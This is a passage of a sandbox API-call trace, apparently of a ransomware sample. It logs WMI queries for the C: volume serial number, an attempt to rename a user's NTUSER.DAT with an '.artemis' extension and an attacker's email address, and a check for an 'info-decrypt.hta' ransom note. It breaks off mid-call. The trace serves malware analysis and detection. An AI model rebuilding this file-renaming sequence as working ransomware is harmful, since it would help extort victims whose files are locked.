Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eea80 | out: ppv=0x71eea80*=0x6737068) returned 0x0 [0151.513] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737068, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eec98 | out: ppvObject=0x71eec98*=0x0) returned 0x80004002 [0151.513] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737068, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eecac | out: ppvObject=0x71eecac*=0x67387e0) returned 0x0 [0151.513] WbemDefPath:IUnknown:Release (This=0x6737068) returned 0x0 [0151.513] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee8cc | out: ppvObject=0x71ee8cc*=0x67387e0) returned 0x0 [0151.513] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee888 | out: ppvObject=0x71ee888*=0x0) returned 0x80004002 [0151.513] WbemDefPath:IUnknown:AddRef (This=0x67387e0) returned 0x3 [0151.513] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee1e4 | out: ppvObject=0x71ee1e4*=0x0) returned 0x80004002 [0151.513] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee194 | out: ppvObject=0x71ee194*=0x0) returned 0x80004002 [0151.513] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee1a0 | out: ppvObject=0x71ee1a0*=0x77be58) returned 0x0 [0151.513] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77be58, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee1a8 | out: pCid=0x71ee1a8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0151.513] WbemDefPath:IUnknown:Release (This=0x77be58) returned 0x3 [0151.514] CoGetContextToken (in: pToken=0x71ee200 | out: pToken=0x71ee200) returned 0x0 [0151.514] CoGetContextToken (in: pToken=0x71ee608 | out: pToken=0x71ee608) returned 0x0 [0151.514] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee698 | out: ppvObject=0x71ee698*=0x0) returned 0x80004002 [0151.514] WbemDefPath:IUnknown:Release (This=0x67387e0) returned 0x2 [0151.514] WbemDefPath:IUnknown:Release (This=0x67387e0) returned 0x1 [0151.514] CoGetContextToken (in: pToken=0x71eef90 | out: pToken=0x71eef90) returned 0x0 [0151.514] CoGetContextToken (in: pToken=0x71eeef0 | out: pToken=0x71eeef0) returned 0x0 [0151.514] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x71eefc0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71eefbc | out: ppvObject=0x71eefbc*=0x67387e0) returned 0x0 [0151.514] WbemDefPath:IUnknown:AddRef (This=0x67387e0) returned 0x3 [0151.514] WbemDefPath:IUnknown:Release (This=0x67387e0) returned 0x2 [0151.514] WbemDefPath:IWbemPath:SetText (This=0x67387e0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0151.514] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67387e0, puCount=0x71ef140 | out: puCount=0x71ef140*=0x2) returned 0x0 [0151.514] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=4, puBuffLength=0x71ef13c*=0x0, pszText=0x0 | out: puBuffLength=0x71ef13c*=0xf, pszText=0x0) returned 0x0 [0151.514] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=4, puBuffLength=0x71ef13c*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef13c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0151.514] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef140 | out: ppv=0x71ef140*=0x72015c) returned 0x0 [0151.514] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef138 | out: pAptType=0x71ef138*=1) returned 0x0 [0151.514] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef13c | out: ppvObject=0x71ef13c*=0x0) returned 0x80004002 [0151.514] IUnknown:Release (This=0x72015c) returned 0x1 [0151.515] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eed60 | out: ppv=0x71eed60*=0x673ee10) returned 0x0 [0151.516] WbemLocator:IUnknown:QueryInterface (in: This=0x673ee10, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eef78 | out: ppvObject=0x71eef78*=0x0) returned 0x80004002 [0151.516] WbemLocator:IClassFactory:CreateInstance (in: This=0x673ee10, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef8c | out: ppvObject=0x71eef8c*=0x6737078) returned 0x0 [0151.516] WbemLocator:IUnknown:Release (This=0x673ee10) returned 0x0 [0151.516] WbemLocator:IUnknown:QueryInterface (in: This=0x6737078, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eebac | out: ppvObject=0x71eebac*=0x6737078) returned 0x0 [0151.516] WbemLocator:IUnknown:QueryInterface (in: This=0x6737078, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71eeb68 | out: ppvObject=0x71eeb68*=0x0) returned 0x80004002 [0151.517] WbemLocator:IUnknown:AddRef (This=0x6737078) returned 0x3 [0151.517] WbemLocator:IUnknown:QueryInterface (in: This=0x6737078, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee4c4 | out: ppvObject=0x71ee4c4*=0x0) returned 0x80004002 [0151.517] WbemLocator:IUnknown:QueryInterface (in: This=0x6737078, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee474 | out: ppvObject=0x71ee474*=0x0) returned 0x80004002 [0151.517] WbemLocator:IUnknown:QueryInterface (in: This=0x6737078, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee480 | out: ppvObject=0x71ee480*=0x0) returned 0x80004002 [0151.517] CoGetContextToken (in: pToken=0x71ee4e0 | out: pToken=0x71ee4e0) returned 0x0 [0151.517] CoGetContextToken (in: pToken=0x71ee8e8 | out: pToken=0x71ee8e8) returned 0x0 [0151.517] WbemLocator:IUnknown:QueryInterface (in: This=0x6737078, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee978 | out: ppvObject=0x71ee978*=0x0) returned 0x80004002 [0151.517] WbemLocator:IUnknown:Release (This=0x6737078) returned 0x2 [0151.517] WbemLocator:IUnknown:Release (This=0x6737078) returned 0x1 [0151.517] CoGetContextToken (in: pToken=0x71eef58 | out: pToken=0x71eef58) returned 0x0 [0151.517] CoGetContextToken (in: pToken=0x71eeeb8 | out: pToken=0x71eeeb8) returned 0x0 [0151.517] WbemLocator:IUnknown:QueryInterface (in: This=0x6737078, riid=0x71eef88*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x71eef84 | out: ppvObject=0x71eef84*=0x6737078) returned 0x0 [0151.518] WbemLocator:IUnknown:AddRef (This=0x6737078) returned 0x3 [0151.518] WbemLocator:IUnknown:Release (This=0x6737078) returned 0x2 [0151.518] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67387e0, puCount=0x71ef11c | out: puCount=0x71ef11c*=0x2) returned 0x0 [0151.518] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=8, puBuffLength=0x71ef118*=0x0, pszText=0x0 | out: puBuffLength=0x71ef118*=0xf, pszText=0x0) returned 0x0 [0151.518] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=8, puBuffLength=0x71ef118*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef118*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0151.518] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x71eeff4 | out: ppv=0x71eeff4*=0x6737088) returned 0x0 [0151.518] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737088, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x71ef088 | out: ppNamespace=0x71ef088*=0x6742fcc) returned 0x0 [0154.557] WbemLocator:IUnknown:QueryInterface (in: This=0x6742fcc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef24 | out: ppvObject=0x71eef24*=0x781544) returned 0x0 [0154.557] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781544, pProxy=0x6742fcc, pAuthnSvc=0x71eef74, pAuthzSvc=0x71eef70, pServerPrincName=0x71eef68, pAuthnLevel=0x71eef6c, pImpLevel=0x71eef5c, pAuthInfo=0x71eef60, pCapabilites=0x71eef64 | out: pAuthnSvc=0x71eef74*=0xa, pAuthzSvc=0x71eef70*=0x0, pServerPrincName=0x71eef68, pAuthnLevel=0x71eef6c*=0x6, pImpLevel=0x71eef5c*=0x2, pAuthInfo=0x71eef60, pCapabilites=0x71eef64*=0x1) returned 0x0 [0154.557] WbemLocator:IUnknown:Release (This=0x781544) returned 0x1 [0154.557] WbemLocator:IUnknown:QueryInterface (in: This=0x6742fcc, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef18 | out: ppvObject=0x71eef18*=0x781564) returned 0x0 [0154.557] WbemLocator:IUnknown:QueryInterface (in: This=0x6742fcc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef14 | out: ppvObject=0x71eef14*=0x781544) returned 0x0 [0154.557] WbemLocator:IClientSecurity:SetBlanket (This=0x781544, pProxy=0x6742fcc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0154.557] WbemLocator:IUnknown:Release (This=0x781544) returned 0x2 [0154.558] WbemLocator:IUnknown:Release (This=0x781564) returned 0x1 [0154.558] CoTaskMemFree (pv=0x77e118) [0154.558] WbemLocator:IUnknown:Release (This=0x6737088) returned 0x0 [0154.558] WbemLocator:IUnknown:QueryInterface (in: This=0x6742fcc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eeb14 | out: ppvObject=0x71eeb14*=0x781564) returned 0x0 [0154.558] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71eead0 | out: ppvObject=0x71eead0*=0x0) returned 0x80004002 [0154.563] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71ee8ec | out: ppvObject=0x71ee8ec*=0x0) returned 0x80004002 [0154.705] WbemLocator:IUnknown:AddRef (This=0x781564) returned 0x3 [0154.705] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee42c | out: ppvObject=0x71ee42c*=0x0) returned 0x80004002 [0154.750] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee3dc | out: ppvObject=0x71ee3dc*=0x0) returned 0x80004002 [0154.751] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee3e8 | out: ppvObject=0x71ee3e8*=0x7814c4) returned 0x0 [0154.751] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7814c4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee3f0 | out: pCid=0x71ee3f0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0154.751] WbemLocator:IUnknown:Release (This=0x7814c4) returned 0x3 [0154.751] CoGetContextToken (in: pToken=0x71ee448 | out: pToken=0x71ee448) returned 0x0 [0154.751] CoGetContextToken (in: pToken=0x71ee850 | out: pToken=0x71ee850) returned 0x0 [0154.751] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee8e0 | out: ppvObject=0x71ee8e0*=0x78154c) returned 0x0 [0154.752] WbemLocator:IRpcOptions:Query (in: This=0x78154c, pPrx=0x781564, dwProperty=2, pdwValue=0x71ee908 | out: pdwValue=0x71ee908) returned 0x80004002 [0154.752] WbemLocator:IUnknown:Release (This=0x78154c) returned 0x3 [0155.795] WbemLocator:IUnknown:Release (This=0x781564) returned 0x2 [0155.795] CoGetContextToken (in: pToken=0x71eee28 | out: pToken=0x71eee28) returned 0x0 [0155.795] CoGetContextToken (in: pToken=0x71eed88 | out: pToken=0x71eed88) returned 0x0 [0155.796] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x71eee58*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x71eee54 | out: ppvObject=0x71eee54*=0x6742fcc) returned 0x0 [0155.796] WbemLocator:IUnknown:AddRef (This=0x6742fcc) returned 0x4 [0155.796] WbemLocator:IUnknown:Release (This=0x6742fcc) returned 0x3 [0155.903] WbemLocator:IUnknown:Release (This=0x6742fcc) returned 0x2 [0155.903] SysStringLen (param_1=0x0) returned 0x0 [0155.903] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738770, puCount=0x71ef1ec | out: puCount=0x71ef1ec*=0x0) returned 0x0 [0155.904] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=2, puBuffLength=0x71ef1e8*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1e8*=0x20, pszText=0x0) returned 0x0 [0155.904] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=2, puBuffLength=0x71ef1e8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef1e8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0155.904] CoGetContextToken (in: pToken=0x71eee58 | out: pToken=0x71eee58) returned 0x0 [0155.904] WbemLocator:IUnknown:AddRef (This=0x781564) returned 0x3 [0155.904] WbemLocator:IUnknown:QueryInterface (in: This=0x781564, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eecec | out: ppvObject=0x71eecec*=0x781564) returned 0x0 [0155.904] WbemLocator:IUnknown:Release (This=0x781564) returned 0x3 [0155.904] WbemLocator:IUnknown:Release (This=0x781564) returned 0x2 [0155.904] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=2, puBuffLength=0x71ef1f0*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1f0*=0x20, pszText=0x0) returned 0x0 [0155.904] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=2, puBuffLength=0x71ef1f0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef1f0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0155.904] IWbemServices:GetObject (in: This=0x6742fcc, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x71ef1a4*=0x0, ppCallResult=0x0 | out: ppObject=0x71ef1a4*=0x673bc60, ppCallResult=0x0) returned 0x0 [0156.271] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67387e0, puCount=0x71ef1a4 | out: puCount=0x71ef1a4*=0x2) returned 0x0 [0156.271] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=4, puBuffLength=0x71ef1a0*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1a0*=0xf, pszText=0x0) returned 0x0 [0156.271] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=4, puBuffLength=0x71ef1a0*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef1a0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0156.272] IWbemClassObject:Get (in: This=0x673bc60, wszName="VolumeSerialNumber", lFlags=0, pVal=0x71ef1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3777178*=0, plFlavor=0x377717c*=0 | out: pVal=0x71ef1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3777178*=8, plFlavor=0x377717c*=0) returned 0x0 [0156.272] SysStringByteLen (bstr="9C354B42") returned 0x10 [0156.272] SysStringByteLen (bstr="9C354B42") returned 0x10 [0156.272] IWbemClassObject:Get (in: This=0x673bc60, wszName="VolumeSerialNumber", lFlags=0, pVal=0x71ef1a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3777178*=8, plFlavor=0x377717c*=0 | out: pVal=0x71ef1a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3777178*=8, plFlavor=0x377717c*=0) returned 0x0 [0156.272] SysStringByteLen (bstr="9C354B42") returned 0x10 [0156.272] SysStringByteLen (bstr="9C354B42") returned 0x10 [0156.272] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", nBufferLength=0x105, lpBuffer=0x71eeda8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", lpFilePart=0x0) returned 0x28 [0156.272] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x71eeda8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x53 [0156.273] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef208) returned 1 [0156.273] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), fInfoLevelId=0x0, lpFileInformation=0x71ef284 | out: lpFileInformation=0x71ef284*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8f3afd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8f3afd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0156.273] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef204) returned 1 [0156.273] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.id-9c354b42.[khalate@tutanota.com].artemis")) returned 0 [0156.275] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", nBufferLength=0x105, lpBuffer=0x71eee4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", lpFilePart=0x0) returned 0x2d [0156.276] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", nBufferLength=0x105, lpBuffer=0x71eee44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", lpFilePart=0x0) returned 0x2d [0156.276] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x71eee4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta", lpFilePart=0x0) returned 0x2e [0156.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef2ac) returned 1 [0156.276] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x71ef328 | out: lpFileInformation=0x71ef328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62089c0, ftCreationTime.dwHighDateTime=0x1d6a20b, ftLastAccessTime.dwLowDateTime=0x62089c0, ftLastAccessTime.dwHighDateTime=0x1d6a20b, ftLastWriteTime.dwLowDateTime=0x622eb20, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0156.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef2a8) returned 1 [0156.276] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", nBufferLength=0x105, lpBuffer=0x71eedc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", lpFilePart=0x0) returned 0x2d [0156.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef274) returned 1 [0156.276] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), fInfoLevelId=0x0, lpFileInformation=0x3777a24 | out: 